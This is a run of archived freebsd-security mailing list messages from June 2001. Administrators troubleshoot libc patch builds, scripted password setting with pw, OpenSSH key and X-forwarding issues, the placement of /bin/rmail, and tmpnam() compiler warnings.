owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > But it seems that: > > 1. > > # cd /usr/src/lib/libc > > > > should be /usr/src/lib/libc/gen, right? > > > > (now in which directory do I "make depend && make all install"?) > > No, it shouldn't. > src/lib/libc/gen contains only part of the libc sources - the so-called > 'generic' functions. In this case, you need to rebuild the whole of libc - > libc/gen only builds several object files, not a whole library. The patch didn't work for me until I cd-ed to .../gen Either the patch or the instructions should be fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 9:46:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id D9DE337B401 for ; Fri, 8 Jun 2001 09:46:20 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f58Glaa74636; Fri, 8 Jun 2001 12:47:36 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Fri, 8 Jun 2001 12:47:36 -0400 (EDT) From: David Miner To: "Karsten W. Rohrbach" Cc: Ralph Huntington , edwin chan , Olivier Nicole , Subject: Re: Encrypted passwords In-Reply-To: <20010608172009.F3071@mail.webmonster.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Long way around the barn, but this worked: `echo -n '$pwd1[$a]' | pw useradd -n $name -c $fullname -d $userhome -s $s -m -h 0`; I replaced all of the encrypted stuff and simplified the program. It is still a mystery as to why it works in adduser, why the encrypted password looks the same as program output and under vipw, but the user cannot login with it. Oh well. Thanks to everyone who helped!!! End of thread. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 9:56:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from java2.dpcsys.com (java2.dpcsys.com [206.16.184.5]) by hub.freebsd.org (Postfix) with ESMTP id 0E79637B401 for ; Fri, 8 Jun 2001 09:56:30 -0700 (PDT) (envelope-from dan@dpcsys.com) Received: from localhost (localhost [127.0.0.1]) by java2.dpcsys.com (8.11.1/8.11.1) with ESMTP id f58GuAc69774; Fri, 8 Jun 2001 09:56:10 -0700 (PDT) Date: Fri, 8 Jun 2001 09:56:10 -0700 (PDT) From: Dan Busarow To: David Miner Cc: freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Jun 8, David Miner wrote: > Long way around the barn, but this worked: > > `echo -n '$pwd1[$a]' | pw useradd -n $name -c $fullname -d $userhome -s $s > -m -h 0`; > > I replaced all of the encrypted stuff and simplified the program. It is > still a mystery as to why it works in adduser, why the encrypted password > looks the same as program output and under vipw, but the user cannot login > with it. Did you forget to rebuild the password DB? pwd_mkdb Dan -- Dan Busarow 949 443 4172 Dana Point Communications, Inc. dan@dpcsys.com Dana Point, California 83 09 EF 59 E0 11 89 B4 8D 09 DB FD E1 DD 0C 82 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 10:20: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id CB78B37B401 for ; Fri, 8 Jun 2001 10:20:02 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GEMG4O00.9DN; Fri, 8 Jun 2001 10:19:36 -0700 Message-ID: <3B210940.A6DFBAB2@globalstar.com> Date: Fri, 08 Jun 2001 10:20:00 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Misha Kamushkin Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh auth. problem References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Misha Kamushkin wrote: > > hello, > > i think i tried everything under the sun to get this to work but > with no results. i need to get ssh to work without prompting me for a > password. i created id_dsa and id_dsa.pub with ssh-keygen. then i export > the key with ssh-keygen -x. after that i copied the exported key to my > server and renamed it known_hosts2 and i also tried athorized_keys2. i > have enable hostbasedauthentication on both client and sever config > files. [snip] > what am i doing wrong. can somebody bring some light on this. what's the > correct step by step configuration. > thanks in advance. You seem to be using OpenSSH at both ends (server and client), correct? Why are you using the SSH2-compatible public key generated with '-x?' You should be using the OpenSSH-compatible public key, id_dsa.pub, and putting it in the remote authorized_keys2 file (not known_hosts2 or athorized_keys2). -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 11:57:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from infinitive.futureperfectcorporation.com (curie.sunesi.com [196.25.112.244]) by hub.freebsd.org (Postfix) with SMTP id ED4E637B407 for ; Fri, 8 Jun 2001 11:57:13 -0700 (PDT) (envelope-from nbm@gerund.futureperfectcorporation.com) Received: (qmail 63198 invoked by uid 0); 8 Jun 2001 19:10:06 -0000 Received: from choke.sunesi.net (HELO gerund.futureperfectcorporation.com) (196.25.112.242) by curie.sunesi.com with SMTP; 8 Jun 2001 19:10:06 -0000 Received: (qmail 57076 invoked by uid 1001); 6 Jun 2001 10:53:21 -0000 Date: Wed, 6 Jun 2001 12:53:21 +0200 From: Neil Blakey-Milner To: Andreas Haugsnes Cc: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606125321.A56634@mithrandr.moria.org> References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606124822.A26583@consistent.unicore.no>; from andreas@haugsnes.no on Wed, Jun 06, 2001 at 12:48:22PM +0200 Organization: iTouch Labs X-Operating-System: FreeBSD 4.3-RELEASE i386 X-URL: http://mithrandr.moria.org/nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote: > I've tested it with FreeBSD 4.3, and I have not found this bug > to apply. Are you using X forwarding? (ie, ssh -X) Neil -- Neil Blakey-Milner nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:15:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [207.167.3.130]) by hub.freebsd.org (Postfix) with ESMTP id 86CA737B405 for ; Fri, 8 Jun 2001 12:15:12 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca) Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.2/8.11.2) with ESMTP id f58JEq556483; Fri, 8 Jun 2001 13:14:52 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200106081914.f58JEq556483@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: Garrett Wollman Cc: Peter Pentchev , freebsd-security@FreeBSD.ORG Subject: /bin/rmail (was: root & toor) In-reply-to: Your message of "Fri, 08 Jun 2001 10:46:00 EDT." <200106081446.KAA36576@khavrinen.lcs.mit.edu> Date: Fri, 08 Jun 2001 13:14:52 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Garrett" == Garrett Wollman writes: Garrett> Unfortunately, as with /etc/rmt, it is part of a protocol Garrett> the client implementations of which we do not control. That's not true. The convention for executing rmail has always[1] been 'uux system!rmail'. It's up to the remote uuxqt to decide what path it's going to use when searching for executables. In FreeBSD, uuxqt searches in /bin, /usr/bin, /usr/local/bin by default. So, moving rmail into /usr/bin won't break the traditional uuxqt execution environment. The only other issue is local execution of /bin/rmail by programs other than uuxqt. A grep through the source tree doesn't show any other program invoking rmail. And I would argue that rmail shouldn't be invoked by anything other than uuxqt. It's presence in /bin is an artifact of there being no concept of libexec directories when UUCP was invented. In fact, I would go so far as to say we should create /usr/libexec/uuxqt/, move rmail into it, and prepend /usr/libexec/uuxqt to the default uuxqt execution search path. --lyndon [1] Well, it's been this way for the 17 years I've been using UUCP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:19:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id B23BF37B403 for ; Fri, 8 Jun 2001 12:19:55 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 17060 invoked by uid 0); 8 Jun 2001 19:19:54 -0000 Received: from p3ee21626.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.38) by mail.gmx.net (mail01) with SMTP; 8 Jun 2001 19:19:54 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA24642 for freebsd-security@FreeBSD.ORG; Fri, 8 Jun 2001 19:13:04 +0200 Date: Fri, 8 Jun 2001 19:13:04 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010608191304.N17514@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20010607220227.W59617@mail.webmonster.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from david@slis-two.lis.fsu.edu on Thu, Jun 07, 2001 at 04:33:38PM -0400 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 16:33 -0400, David Miner wrote: > On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote: > > > correct me if i am just stupid, but i don't get the point > > echo -n passW0Rd | pw -u testuser -h 1 > > sets the password of "testuser" to "passW0Rd", soring it in > > the auth system you prefer in encrypted form. am i missing > > something? > > > > /k > > > No, I don't think you have missed the point. Using echo and > piping it into pw would work. I am trying read the cleartext > password from a file and, since I haven't figured out how the > pw file descriptor works, encrypt it and use the chpass utility > to get it into /etc/passwd. Why are you trying to do this manually? It's as simple as echo "$PASSWORD" | pw usermod -n $USERNAME -h 0 (this is exactly what you can read in "man pw"). There shouldn't be much of a problem in any scripting language to pipe the cleartext password into the pw(8) command after creating the user (or during creating it, but I didn't test this -- while changing an existing user's password went fine here, as well as disabling it by means of "-h -"). > It looks like it encrypts correctly, but the user cannot log in > with that password. So something must be wrong with the > encryption system or the way I have put the pieces together. The problem probably is that you want to reinvent existing functionality. :) Just use what's at your hands! virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:28:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 181E437B407 for ; Fri, 8 Jun 2001 12:28:28 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f58JS3T58413; Fri, 8 Jun 2001 15:28:03 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 8 Jun 2001 15:27:58 -0400 (EDT) From: Rob Simmons To: Neil Blakey-Milner Cc: Andreas Haugsnes , security@FreeBSD.ORG Subject: Re: [fwd] SSH allows deletion of other users files... In-Reply-To: <20010606125321.A56634@mithrandr.moria.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 With X forwarding on in /etc/ssh/sshd_config: X11Forwarding yes and using ssh -X @ I don't see any ssh files in /tmp. Does this bug apply to FreeBSD's version of OpenSSH? Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 6 Jun 2001, Neil Blakey-Milner wrote: > On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote: > > I've tested it with FreeBSD 4.3, and I have not found this bug > > to apply. > > Are you using X forwarding? (ie, ssh -X) > > Neil > -- > Neil Blakey-Milner > nbm@mithrandr.moria.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7ISdCv8Bofna59hYRA3H3AJ9yEm89HCI3aLt4NLBYSYuTtRq60ACgswIX lJdsT92Q7wG/fNSaLsl5/hU= =pSge -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:37: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [207.167.3.130]) by hub.freebsd.org (Postfix) with ESMTP id B172D37B406 for ; Fri, 8 Jun 2001 12:36:57 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca) Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.2/8.11.2) with ESMTP id f58Jaq556650; Fri, 8 Jun 2001 13:36:52 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200106081936.f58Jaq556650@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company Cc: Garrett Wollman , Peter Pentchev , freebsd-security@FreeBSD.ORG Subject: Re: /bin/rmail (was: root & toor) In-reply-to: Your message of "Fri, 08 Jun 2001 13:14:52 MDT." <200106081914.f58JEq556483@orthanc.ab.ca> Date: Fri, 08 Jun 2001 13:36:52 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Lyndon" == Lyndon Nerenberg writes: Lyndon> The only other issue is local execution of /bin/rmail by Lyndon> programs other than uuxqt. A grep through the source tree Lyndon> doesn't show any other program invoking rmail. And of course I meant "other than sendmail." --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:37:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 617D837B403 for ; Fri, 8 Jun 2001 12:35:44 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 56078 invoked by uid 1000); 8 Jun 2001 19:34:00 -0000 Date: Fri, 8 Jun 2001 22:34:00 +0300 From: Peter Pentchev To: Rob Simmons Cc: Neil Blakey-Milner , Andreas Haugsnes , security@FreeBSD.ORG Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010608223400.C54030@ringworld.oblivion.bg> Mail-Followup-To: Rob Simmons , Neil Blakey-Milner , Andreas Haugsnes , security@FreeBSD.ORG References: <20010606125321.A56634@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rsimmons@wlcg.com on Fri, Jun 08, 2001 at 03:27:58PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If you do ssh -v -v -X user@host, and you do this from within an X terminal (so there is an X session to forward to ;), is there some XAUTHORITY output at the end? If not, then: - Is X installed on the server host? - Is there a /usr/X11R6/bin/xauth on the server host, executable by your user? - Are you really sure you're running the client from within an X session? :) G'luck, Peter -- You have, of course, just begun reading the sentence that you have just finished reading. On Fri, Jun 08, 2001 at 03:27:58PM -0400, Rob Simmons wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > With X forwarding on in /etc/ssh/sshd_config: > X11Forwarding yes > > and using > ssh -X @ > > I don't see any ssh files in /tmp. Does this bug apply to FreeBSD's > version of OpenSSH? > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Wed, 6 Jun 2001, Neil Blakey-Milner wrote: > > > On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote: > > > I've tested it with FreeBSD 4.3, and I have not found this bug > > > to apply. > > > > Are you using X forwarding? (ie, ssh -X) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:47:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id A671D37B401 for ; Fri, 8 Jun 2001 12:47:28 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f58JlEF59281; Fri, 8 Jun 2001 15:47:14 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 8 Jun 2001 15:47:10 -0400 (EDT) From: Rob Simmons To: Peter Pentchev Cc: Neil Blakey-Milner , Andreas Haugsnes , security@FreeBSD.ORG Subject: Re: [fwd] SSH allows deletion of other users files... In-Reply-To: <20010608223400.C54030@ringworld.oblivion.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Hmmm... It works. I'm going to shut up now :) Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 8 Jun 2001, Peter Pentchev wrote: > If you do ssh -v -v -X user@host, and you do this from within an X terminal > (so there is an X session to forward to ;), is there some XAUTHORITY output > at the end? > > If not, then: > - Is X installed on the server host? > - Is there a /usr/X11R6/bin/xauth on the server host, executable by your user? > - Are you really sure you're running the client from within an X session? :) > > G'luck, > Peter > > -- > You have, of course, just begun reading the sentence that you have just finished reading. > > On Fri, Jun 08, 2001 at 03:27:58PM -0400, Rob Simmons wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: RIPEMD160 > > > > With X forwarding on in /etc/ssh/sshd_config: > > X11Forwarding yes > > > > and using > > ssh -X @ > > > > I don't see any ssh files in /tmp. Does this bug apply to FreeBSD's > > version of OpenSSH? > > > > Robert Simmons > > Systems Administrator > > http://www.wlcg.com/ > > > > On Wed, 6 Jun 2001, Neil Blakey-Milner wrote: > > > > > On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote: > > > > I've tested it with FreeBSD 4.3, and I have not found this bug > > > > to apply. > > > > > > Are you using X forwarding? (ie, ssh -X) > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7ISvCv8Bofna59hYRA9UqAJ4wYdLUEGoUFU/0G9j5mC7aDTFxHACffT/e igQ6elnzzHWp5UHLsdDYas4= =vapR -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 13:26:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 750A637B403 for ; Fri, 8 Jun 2001 13:26:28 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.57.207]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010608202627.CHNL19826.tomts7-srv.bellnexxia.net@frogbox.glassfish.net> for ; Fri, 8 Jun 2001 16:26:27 -0400 Received: (qmail 22761 invoked from network); 8 Jun 2001 20:26:26 -0000 Received: from unknown (HELO MAINWS) (192.0.0.80) by 192.0.0.4 with SMTP; 8 Jun 2001 20:26:26 -0000 From: "Michael Tang Helmeste" To: "Buliwyf McGraw" Cc: Subject: RE: Unsafe Message Date: Fri, 8 Jun 2001 16:26:14 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, this may be changed in newer versions of the library, or you could go into the code yourself and change it. Personally I don't like going into other people's code, but if you really want to fix this, then the best of luck to you :) Theres not much other answer that I can provide other than this, sorry. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Buliwyf McGraw Sent: Thursday, June 07, 2001 10:30 PM To: Michael Tang Helmeste Cc: security@FreeBSD.ORG Subject: RE: Unsafe Message > If its not in your code, its most likely in one of the libraries that it > uses. Thanks for your answer. I was reading the man of the functions: tmpnam() tempnam, tmpfile, tmpnam - temporary file routines mkstemp() make temporary file name (unique) But i am not sure about how improvement the libraries... i mean, there is a patch or something for this specific error??? Thanks for any "smart" answer. > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chris Johnson > Sent: Thursday, June 07, 2001 9:36 PM > To: Buliwyf McGraw > Cc: security@FreeBSD.ORG > Subject: Re: Unsafe Message > > > On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote: > > Everytime that i compile something on my server, i get this message: > > > > warning: tmpnam() possibly used unsafely; consider using mkstemp() > > > > What it means? > > tmpnam() was possibly used unsafely > > > how i can avoid it? > > consider using mkstemp() > > Chris > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 13:38:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id EDDB137B401 for ; Fri, 8 Jun 2001 13:38:55 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta11/8.12.0.Beta11) with ESMTP id f58Kcs4N068068 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 8 Jun 2001 13:38:54 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta11/8.12.0.Beta11) id f58KcsTr068065; Fri, 8 Jun 2001 13:38:54 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15137.14301.996243.90366@horsey.gshapiro.net> Date: Fri, 8 Jun 2001 13:38:53 -0700 From: Gregory Neil Shapiro To: Lyndon Nerenberg Cc: Garrett Wollman , Peter Pentchev , freebsd-security@FreeBSD.ORG Subject: Re: /bin/rmail (was: root & toor) In-Reply-To: <200106081936.f58Jaq556650@orthanc.ab.ca> References: <200106081914.f58JEq556483@orthanc.ab.ca> <200106081936.f58Jaq556650@orthanc.ab.ca> X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lyndon> The only other issue is local execution of /bin/rmail by Lyndon> programs other than uuxqt. A grep through the source tree Lyndon> doesn't show any other program invoking rmail. lyndon> And of course I meant "other than sendmail." sendmail doesn't invoke rmail. rmail invokes sendmail. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 13:59:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [207.167.3.130]) by hub.freebsd.org (Postfix) with ESMTP id 01B8237B406; Fri, 8 Jun 2001 13:59:55 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca) Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.2/8.11.2) with ESMTP id f58Kxs557021; Fri, 8 Jun 2001 14:59:54 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200106082059.f58Kxs557021@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: Gregory Neil Shapiro Cc: freebsd-security@FreeBSD.ORG Subject: Re: /bin/rmail (was: root & toor) In-reply-to: Your message of "Fri, 08 Jun 2001 13:38:53 PDT." <15137.14301.996243.90366@horsey.gshapiro.net> Date: Fri, 08 Jun 2001 14:59:54 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Gregory" == Gregory Neil Shapiro writes: Gregory> sendmail doesn't invoke rmail. rmail invokes sendmail. I was being pedantic. Sendmail does invoke rmail, but only on ancient HP/UX boxen, and they use /usr/bin/rmail. --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 14: 6:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from superconductor.rush.net (superconductor.rush.net [208.9.155.8]) by hub.freebsd.org (Postfix) with ESMTP id ECCC637B401 for ; Fri, 8 Jun 2001 14:06:48 -0700 (PDT) (envelope-from bright@superconductor.rush.net) Received: (from bright@localhost) by superconductor.rush.net (8.11.2/8.11.2) id f58L6FV21153; Fri, 8 Jun 2001 17:06:15 -0400 (EDT) Date: Fri, 8 Jun 2001 17:06:14 -0400 From: Alfred Perlstein To: Michael Tang Helmeste Cc: Buliwyf McGraw , security@FreeBSD.ORG Subject: Re: Unsafe Message Message-ID: <20010608170613.I1832@superconductor.rush.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0us In-Reply-To: ; from glassfish@frogbox.dyndns.org on Fri, Jun 08, 2001 at 04:26:14PM -0400 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please trim your messages, please get a mail client that quotes messages properly. > > On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote: > > > Everytime that i compile something on my server, i get this message: > > > > > > warning: tmpnam() possibly used unsafely; consider using mkstemp() > > > > > > What it means? * Michael Tang 